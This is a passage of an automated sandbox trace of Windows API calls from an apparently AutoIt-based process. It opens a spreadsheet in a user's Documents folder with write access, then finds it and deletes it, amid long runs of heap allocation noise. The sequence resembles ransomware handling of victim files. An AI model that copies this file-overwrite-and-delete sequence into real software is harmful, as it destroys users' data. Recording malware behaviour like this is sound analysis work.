lpsz="handle") returned 0x6 [0034.521] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.521] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\2ku7the4lqt.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0034.521] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0034.521] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.522] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.522] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.522] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.522] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.522] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.522] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.522] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.522] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.523] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0034.524] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.524] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.524] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.524] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.524] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.524] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.524] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.524] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.524] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0034.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0034.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0034.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.525] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.525] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.525] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.525] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls", lpFilePart=0x0) returned 0x74 [0034.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.525] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76580980, ftCreationTime.dwHighDateTime=0x1d5baac, ftLastAccessTime.dwLowDateTime=0x9d824440, ftLastAccessTime.dwHighDateTime=0x1d5b5f6, ftLastWriteTime.dwLowDateTime=0x14760180, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x12571, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="2KU7thE4LQT.xls", cAlternateFileName="2KU7TH~1.XLS")) returned 0x7c2240 [0034.525] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\2ku7the4lqt.xls")) returned 1 [0034.527] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76580980, ftCreationTime.dwHighDateTime=0x1d5baac, ftLastAccessTime.dwLowDateTime=0x9d824440, ftLastAccessTime.dwHighDateTime=0x1d5b5f6, ftLastWriteTime.dwLowDateTime=0x14760180, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x12571, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="2KU7thE4LQT.xls", cAlternateFileName="2KU7TH~1.XLS")) returned 0 [0034.527] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0034.527] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0034.528] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0034.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0034.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0034.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0034.529] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af378 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898e0 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.529] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0034.529] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0034.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 